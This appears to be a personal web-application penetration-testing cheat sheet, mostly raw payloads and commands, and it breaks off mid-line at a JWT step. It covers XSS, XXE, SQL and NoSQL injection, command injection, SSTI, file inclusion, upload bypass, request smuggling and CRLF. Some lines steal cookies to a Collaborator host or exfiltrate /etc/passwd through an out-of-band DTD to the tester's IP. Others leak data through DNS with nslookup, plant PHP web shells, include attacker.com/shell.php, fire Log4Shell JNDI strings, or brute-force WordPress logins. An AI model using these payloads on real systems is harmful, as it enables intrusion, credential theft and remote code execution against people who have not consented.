Table of Contents
-
- https://www.securitydrops.com/the-web-api-authentication-guide/
- https://beeceptor.com/
- http://dnslog.cn/
- https://webhook.site/
- http://receive-sms-online.com/
- http://freesmsverification.com/
- https://hs3x.com/
- http://sms.sellaite.com/
- https://pentestbook.six2dez.com/enumeration/web/general-info
- https://book.hacktricks.xyz/pentesting/pentesting-web
-
- Burp Suite
- Dirbusting
- XSS
- XXE
- XXE-OOB
- SQL injection
- NoSQL Injection
- Command Injection
- CSRF
- SSRF
- SSTI
- LFI
- RFI
- File Upload Bypass
- Clickjacking
- Session fixation
- Java Platform
- LDAP injection
- Host Header Injection
- Web Cache Poisoning
- Open Redirect
- HTTP Smuggling
- CORS
- IDOR
- SAML
- CMS
- CRLF
- WebSockets
- JWT
- GWT
- GraphQL
- MongoDB
- AWS
- Link finder
- Bing -> ip:79.98.28.23
theharvester -d example.com -b all curl -s "http://web.archive.org/cdx/search/cdx?url=something.example.com/*&output=text&fl=original&collapse=urlkey"# SHODAN CLI
# Shodan init
shodan init API_KEY
# Shodan get host info
shodan host IP
openssl s_client -connect domainlmao.com:443 < /dev/null | openssl x509 -noout -text | grep -C3 -i dns- TCP: grc nmap -sC -sV -vv -p- 10.10.10.120 -T5
- UDP: grc nmap -sU -sV -vv -oA quick_udp 10.10.10.10
- VULN: grc nmap --script vuln IP sslscan www.example.com testssl www.example.comdig axfr @xyz.domain.com xyz.domain.com nikto -h www.example.com# Nikto throught Burp suite
vim /etc/nikto.conf -> LW_SSL_ENGINE=SSLeay
nikto -h www.domain.es:443 -useproxy http://127.0.0.1:8080/pip install wapiti3
# Wapiti throught Burp suite
wapiti -u https://domain/ -n 5 -b domain -p http://127.0.0.1:8080
https://github.com/projectdiscovery/nuclei# Outdated, but good for old systems or OSCP
https://github.com/hatRiot/clusterd
clusterd -i URL# Cool Burp plugins (Not in particular order)
* https://github.com/synacktiv/HopLa
* .NET Beautifier
* Active Scan++
* Backslash powered scanner
* CMS Scanner
* Collaborator everywhere
* CMI Attacker
* Content type converter
* CSRF Scanner
* Error message checks
* Exiftool scanner
* Freddy
* HTML5 Auditor
* HTTP Request Smuggler
* J2EEScan
* https://github.com/silentsignal/burp-log4shell
* Java deserialization scanner
* java serial killer
* JS link finder
* JS Link finder
* JSON Decoder
* Json web tokens attacker
* NGINX alias traversal
* PHP object injection check
* Reflected params
* Retire.js
* SAML Raider
* Software vuln scanner
* SSL Scanner
* Upload Scanner
* Web Cache deception scanner
* Logger++
* JSON Web Tokens
* SSRF-King
* AWS Security Checks
* Additional Scanner checks
* Autorize
- Copy the session cookie of unprivileged user
- Paste it Autorize plugin in burp
- Check interpect request from Repeater
- Autorize ON
- Browse the web with privileged/admin user
- GG WP
- Wfuzz
wfuzz -c --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://IP:PORT/FUZZwfuzz -c --hc=404 -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt https://IP:PORT/FUZZ- ffuf
# Normal directory bruteforce.
ffuf -c -w /path/to/wordlist -u https://IP:PORT/FUZZffuf -mc all -c -u http://10.10.10.168:8080/FUZZ -w /SecLists/Discovery/Web-Content/raft-large-directories.txt -e .js,.php,.bak,.txt,.asp,.aspx,.jsp,.html,.zip,.jar,.sql,.json,.old,gz,.shtml,.log,.swp,.yaml,.yml,.config,.save,.rsa,.ppk-recursion -recursion-depth 4# VHOST discovery
ffuf -c -w wordlist.xd -u URL -H "Host: FUZZ.url"# GET param fuzzing
ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
ffuf -w /path/to/values.txt -u https://target/script.php?valid_name=FUZZ -fc 401# POST data fuzzing
ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401# Route through proxy
ffuf -x socks5://IP:PORT- GoBuster
#Old gobuster
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php#New gobuster
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 80 -x php,txt,html,htm,bak,tmp,temp -s 200,204,301,302,307
# VHOST Discovery
gobuster vhost -u hackycorp.com -w /SecLists/Discovery/DNS/subdomains-top1million-110000.txt- IIS
# IIS ShortName Scanner
https://github.com/irsdl/IIS-ShortName-Scanner
java -jar iis_shortname_scanner.jar 2 20 URL
# After finding semi-names try to fuzz the rest of the file names
./crunch 0 3 abcdefghijklmnopqrstuvwxyz0123456789 -o 3chars.txt
ffuf -w final_crunch_wordlist.txt -D -e asp,aspx,ashx,asmx -t 1000 -c -u http://lmao/initialWordFUZZ
# Can you read the web.config file? Cool.
* Obtain the machineKey variable ( validationKey and decryptionKey)
* VIEWSTATE → ObjectStateFormater (Insecure Deserialization) → RCE
https://github.com/0xacb/viewgen
# WebResource.axd:
https://github.com/inquisb/miscellaneous/blob/master/ms10-070_check.py
# ASP - force error paths
/con/
/aux/
con.aspx
aux.aspx
# HTTPAPI 2.0 404 Error
Change Host header to correct subdomain
Add to /etc/hosts
Scan again including IIS Shortnames
# MSF
use auxiliary/scanner/iis_shortname_scanner- .DS_Store
https://github.com/lijiejie/ds_store_exp
[DOM] -> Inject in URL
[STORED] -> Saved in the server, like a database
[REFLECTED] -> Returned in an error message, search result or any other response
http://www.jsfuck.com/
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
<svg onload=alert('XSS')
"><script>alert(1)</script>
<script>alert(document.cookie);</script>
<script>alert(1)</script>
pentest<marquee onstart=confirm(1)>
<script>alert("hello")</script>
<a onmouseover="alert(13)">xxs link</a>
<img src="a.jpg" onerror="javascript:alert(1)"/>
' onerror='alert(1)';
javascript:alert(1)
<body onload=alert("XSS")>
<img src=x onError=alert('xss')>
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
\"-alert(1)}//
# xss , sqli, ssti
'"><svg/onload=alert()>{{7*7}}
#DOM
blopblop</option></select><img src="" onerror="alert('lmao')">
German#<script>alert('LMAO')</script>
#Blacklist bypass
1. " for ' and vice versa according to where injection lands
1. alert(1) for (confirm)(1) or confirm`1` or confirm(1) or print()
2. // for <!--
3. spaces for / or %0A, %0C or %0D.
# Steal cookie with burp collaborator and stored XSS
<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
https://netsec.expert/posts/xss-in-2021/
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injectionhttps://github.com/s0md3v/XSStrike
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>%26test%3B</root>https://backtrackacademy.com/articulo/explorando-la-vulnerabilidad-xxe-xml-external-entity
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
# Example
Let's say the web sends this
Content-type: application/json
{"message":"135601360123502401401250"}# Changing the content type to /xml we see an error of XML, which means we can actually inject XML, rather than JSON.
# Let's format the above json to XML, the result is the same as the original request with JSON. So we
# are actually sending XML, which means a pontentially XXE vuln.
<!--?xml version="1.0" ?-->
<!DOCTYPE message [
<!ELEMENT message ANY>
]>
<message>135601360123502401401250</message>
# Another payload to do the same:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
]>
<message>&id;</message>
# Cool, let's try to load a file from another server
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
<!ENTITY % dtd SYSTEM "https://google.com">
%dtd;
]>
<message>&id;</message>
# But it won't work , our url is reflected in the response tho.
# We can try to load local files with:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
<!ENTITY % dtd SYSTEM "/etc/passwd">
%dtd;
]>
<message>&id;</message>
# But, again, nothing , this time we get a markup error.
# Abusing both errors we can force a markup error, read the flag, and send the error to display in the response.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file://flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<message>&id;</message>
If we can't see the response or ran into character/file restrictions we have to do OOB attacks. We have to define a DTD( Document Type Definition) to perform an OOB-XXE. A DTD is a well-structured XML file, it will contain all of our attack/exfil payloads, which will help us get around a lot of the character limitations.
# ATTACK STAGES:
-1. Modified XXE XML Attack
-2. Vulnerable XML parser grab a DTD file from an Attacker's Server.
-3. DTD file contains code to read the /etc/passwd file
-4. DTD file contains code to exfil the contents of the data out (potentially encoded)
payload.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://[your_ip]:8888/collect=%file;'>">
%all;Prepare netcat
nc -lp 8888
Prepare web server
python -m SimpleHTTPServer 80
BURP
<?xml version="1.0"?><!DOCTYPE thp [<!ELEMENT thp ANY ><!ENTITY % dtd SYSTEM "http://[your_ip]/payload.dtd"> %dtd;]><thp><error>%26send%3B</error></thp>http://url.com/cat.php?id=2%20union%20select%201,table_name,3,4%20from%20information_schema.tablesDetection of an SQL injection entry point Simple characters
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)Multiple encoding
%%2727
%25%27Merging characters
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERPLogic Testing
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- falseWeird characters
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://support.portswigger.net/customer/portal/articles/2791040-using-burp-with-sqlmap
https://github.com/RhinoSecurityLabs/SleuthQL
find . -name "*.txt" -exec sqlmap --batch -r {} \;
Vulnerabilities in NoSQL injections typically occur when: (1) the endpoint accepts JSON data in the request to NoSQL databases, and (2) we are able to manipulate the query using NoSQL comparison operators to change theNOSQL query.
A common example of a NoSQL injection would be injecting something like:
[{"$gt":""}] -> This JSON object is basically saying that the operator ($gt) is greater than NULL ("") Since logically eveything is greater than NULL, the JSON object becomes a true statement, allowing us to bypass or inject into NoSQL queries. This would be equivalent to [' or 1=1--] in SQL injection world. In MongoDB, we can use one of the following conditional operators:
- (>) greater than - $gt
- (<) less than - $lt
- (>=) greater than equal to - $gte
- (<=) less than equal to - $lte
# Example:
1-> {"username":"admin","password":"admin"}
2-> {"username":"admin","password":{"$gt":""}}
username=admin&password[$gt]=&submit=login
username[$gt]=admin&password[$gt]=&submit=login
https://www.owasp.org/index.php/Command_Injection
# Common injections
&&
|
;
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
assert() error. -> /?name=hacker'.system("cmd").'
eval() ruby error. -> /?username=hacker"%2b`whoami`%2b"
# DNS exfiltration
Example:
Let's say we have a webpage with command injection vuln, we can exploit it using "&".
dnschef --fakeip=10.10.10.106 -i your_ip --logfile=exfil [ Setup fake DNS server ]
tail -f exfil | grep --line-buffered cooking | cut -d' ' -f11 [ Parse output file ]
Injection: & nslookup this.is.a.test your_ip
If we see the "this.is.a.test" string in our fake DNS, the server is vulnerable.
Windows exfiltration:
& for /f "usebackq tokens=1,2 delims=\" %i in (`whoami`) do nslookup %i_%j your_ip
Example:
* Select a request anywhere in Burp Suite Professional that you want to test or exploit.
* From the right-click context menu, select Engagement tools / Generate CSRF PoC.
* Burp Suite will generate some HTML that will trigger the selected request (minus cookies, which will be added automatically by the victim's browser).
* You can tweak various options in the CSRF PoC generator to fine-tune aspects of the attack. You might need to do this in some unusual situations to deal with quirky features of requests.
* Copy the generated HTML into a web page, view it in a browser that is logged in to the vulnerable web site, and test whether the intended request is issued successfully and the desired action occurs.
# Anti-CSRF token on automated tasks with burp
https://portswigger.net/support/using-burp-suites-session-handling-rules-with-anti-csrf-tokens
https://www.imperva.com/learn/application-security/csrf-cross-site-request-forgery/
https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)
https://support.portswigger.net/customer/portal/articles/1965674-using-burp-to-test-for-cross-site-request-forgery-csrf-
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
https://github.com/swisskyrepo/SSRFmap
https://github.com/epinna/tplmap
* Marks the injection point
python tplmap.py -u "http://chat:3000/ti?user=*&comment=*&link=*"
#Popular Template Engines
•PHP –Smarty, Twigs
•JAVA –Velocity, Freemaker
•Python –JINJA, Mako, Tornado
•JavaScript –Jade, Rage
•Ruby -Liquid
# Payloads
Same as XSS (If you find a xss try SSTI too)
<%=+7*7+%>
<%=+system("cat+/home/carlos/morale.txt")+%>
${7*7}
{{7*7}}
{{7*7'}}
a{*comment*}b
${"z".join("ab")}
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
https://sushant747.gitbooks.io/total-oscp-guide/content/local_file_inclusion.html
../../../etc/passwd
../../../etc/passwd%00
%252e%252e%252fetc%252fpasswd
..///////..////..//////etc/passwd
….//….//….//….//etc/passwd
../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
../../../../[…]../../../../../etc/passwd
expect://whoami
data:text/plain;,<?php echo shell_exec($_GET['cmd']);?>
php://filter/convert.base64-encode/resource=index.php
https://github.com/P0cL4bs/Kadimus
To avoid extensions you cand append a null byte: %00
http://192.168.1.34/vulnerabilities/fi/?page=https://www.attacker.com/shell.php
http://192.168.1.34/vulnerabilities/fi/?page=HTTPS://www.attacker.com/test.txt%00
http://192.168.1.34/vulnerabilities/fi/?page=file:///E:\xampp\htdocs\prueba.txt
Set filename to sleep(10)-- -.jpg and you may be able to achieve a SQL injection
shell.png.png [ Intercep with burp and change to shell.php ]
shell.php [ Content-Type from octect/stream to image/jpeg ]
shell.php [ Content-Type to image/gif and start the file with GIF89a;]
shell.php5 shell.php4 ...
shell.PhP shell.phP shell.pht ...
shell.php;jpeg [ , & | ]
shell.php/./././[...]
shell.php ... ...... [ Add spaces or dots ]
shell.php.sfdfwewfejpg
shell.php%001.jpg or shell.php\x00.jpg [ Alternative: shell.phpD.jpg , RAW, 44 to 00 ]
../../../../logo.jpg [ Maybe you can replace webpage images ]
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' myFile.jpeg
mv myFile.jpeg myFile.php.jpeg
https://thibaudrobin.github.io/articles/bypass-filter-upload/
# Allows .svg ?
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
# Allows .zip? , then create a symbolic link
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="https://domain_to_test/" width="500" height="500"></iframe>
</body>
</htmlClickjacking to XSS :-)
<b onmouseover=alert('Wufff!')>click me!</b>
<isindex x="javascript:" onmouseover="alert(XSS)">click me!
<input type="text" value="" Onblur=alert(666) size="30">
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<img ismap= itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>
<img ismap=itemtype=yyy style=width:100%;height:100%;position:fixed;left:0px;top\ :0px; onmouseover=alert(/XSS/)//>
<a href="#" onclick="alert(1)"> //If the user clicks in the next <a> the alert will be executed
Example:
We have an URL like this -> http://localhost:8080/bankLOLZ/?sessionID=34564KINIU2UV24U3V4QWDE33T
In the sessionID, we can try replacing numbers or letters ( We craft our own sessionID ) , we send the link
to the victim, the victim logs in using our crafted URL with our sessionID, once the victim logs in, we can use
the same sessionID. We do a get petition with burp to some place in the web app, like this.
-> http://localhost:8080/bankLOLZ/accountManagement/victims_name
And we are in the web app using victim's account.
python jexboss.py -u https://domain/index.action# Try in different headers
X-Api-Version: ${jndi:ldap://127.0.0.1.COLLABORATOR_URL}
# BURP EXTENSION
https://portswigger.net/bappstore/186be35f6e0d418eb1f6ecf1cc66a74d
CLI - TOOL
--> example.php?name=hacker&password=hacker
Inversed querys give different results
--> example.php?name=*)(objectClass=*&password=hacker
--> example.php?name=*)(!(objectClass=*)&password=hacker
# auth bypass
--> example.php?name=hacker)(cn=*))%00&password=hacker
Host: example.com -> Host: microsoft.com
Different web server behaves differently for duplicate http host header, NGINXuses last host header to identify the request, Apache/IIS concatenates.
Host: example.com
Host: microsoft.com
Host: example.com
X-Forwarded-Host: microsoft.com
https://portswigger.net/blog/practical-web-cache-poisoning
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>
HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<meta property="og:image" content="https://a."><script>alert(1)</script>"/>
https://s0cket7.com/open-redirect-vulnerability/
# If the redirection is made, then it's vulnerable
/red.php?url=https://example.com
https://example.com
# Try injectin in Referer header
Referer: http://sexy_malicious_hacker.com
Referer: https://www.qualys.comhttps://portswigger.net/web-security/request-smuggling
# Smuggler.py is a small tool used to test that
python smuggler.py -h# Send twice, on the second response we should see the vulnerability
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
0
GPOST / HTTP/1.1
Host: example.com
POST / HTTP/1.1
Host: example.com
Content-Length: 3
Transfer-Encoding: chunked
6
PREFIX
0
POST / HTTP/1.1
Host: example.com
# Hiding our Transfer-encoding
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
GET / HTTP/1.1
Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
# Request
Origin: http://domain_auditing.evil.net
# Response
Access-Control-Allow-Origin: http://domain_auditing.evil.net
# Request
/OPTIONS
Origin: http://example.com
Access-Control-Request-Method: DELETE
# Response
Access-Control-Allow-Origin: http://example.com
Access-Control-Allow-Methods: PUT, POST, DELETE
# Bypass restrictions using parameter pollution
# You can use the same parameter several times
api.example/profile?UserId=123 # Ok, your profile
api.example/profile?UserId=456 # ERROR
api.example/profile?UserId=456&UserId=123 # OK, it can work# Tips
# - Some encoded/hashed IDs can be predictable --> Create accounts to see
# - Try some id, user_id, message_id even if the application seems to not offer it (on API for ex)
# - Parameter Polluttion (HPP)
# - Switch between POST and PUT to bypass potential controls
# -
https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/
https://github.com/anouarbensaad/vulnx- Tomcat
/examples/jsp/%252e%252e/%252e%252e/manager/html
tomcat tomcat
admin
admin manager
admin password
admin s3cret- Multipurpose
https://github.com/Tuhinshubhra/CMSeeK
https://github.com/Dionach/CMSmap
- Wordpress
# Scan plugins and users
wpscan --url http://ip/wp/ -eu
# Bruteforce login
wpscan --url IP -U 'admin ' -P /usr/share/wordlists/rockyou.txt --max-threads 50
# 404.php path reminder (I always forget xd)
http://10.10.252.204/wp-content/themes/twentyfifteen/404.php
https://gf.dev/wordpress-security-scanner
https://sitecheck.sucuri.net/
https://github.com/m4ll0k/WPSeku
https://github.com/Jamalc0m/wphunter
https://github.com/10up/wp-vulnerability-scanner
https://github.com/RamadhanAmizudin/Wordpress-scanner
- Joomla
#https://github.com/drego85/JoomlaScan
python joomlascan.py -u URL
# Scan Joomla - version docker disponible
joomlavs --url www.monsite.com -v
# Enumeration
joomlavs --url www.monsite.com -a # All
joomlavs --url www.monsite.com -c # Composants
joomlavs --url www.monsite.com -m # Modules
joomlavs --url www.monsite.com -t # Templates
joomlavs --url www.monsite.com -q # Quiet : full passif
- Drupal
https://github.com/droope/droopescan
./droopescan scan drupal -u http://example.org/ -t 32
Request:
/%0d%0aLocation:%20http://myweb.com
Response:
Location: http://myweb.com
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
The difference between a websocket and a HTTP petition is the following: WebSockets -> Keep the connection active HTTP -> Makes petition, closes connection.
# Manipulating WebSocket messages to exploit vulnerabilities
# Send msg , it might be html encoded, just edit the request in burp again.
{message":"<img src=1 onerror='alert(1)'>"}
# Like so
{"message":"<img src=1 onerror='alert(1)'>"}# Manipulating the WebSocket handshake to exploit vulnerabilities
# In some cases the WebSockets might have some protecctions
{"error":"Attack detected: Event handler"}
# If your IP gets blacklisted try to add the following in the request :P
X-Forwarded-For: 1.1.1.1
# Then just try with some XSS bypasses
<iframe src='jAvAsCripT:alert`1`'></iframe># Automated tool and exploitation helper
https://github.com/ticarpi/jwt_tool# Make sure to add == if needed when decoding, and delete them when pasting in burp.
# Cookie auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRyM21iMCIsImlhdCI6IjE1ODM1MzE4NjQifQ==.MjM0ZDRlMTM3YWZkZWRiYTliYWM3ZWUyZDk5ZmE3MTViYmY4NWM1NzA5ZTUwMTkxYjY3NDFiNzkwNjk0NWQxOA
# Decode as:
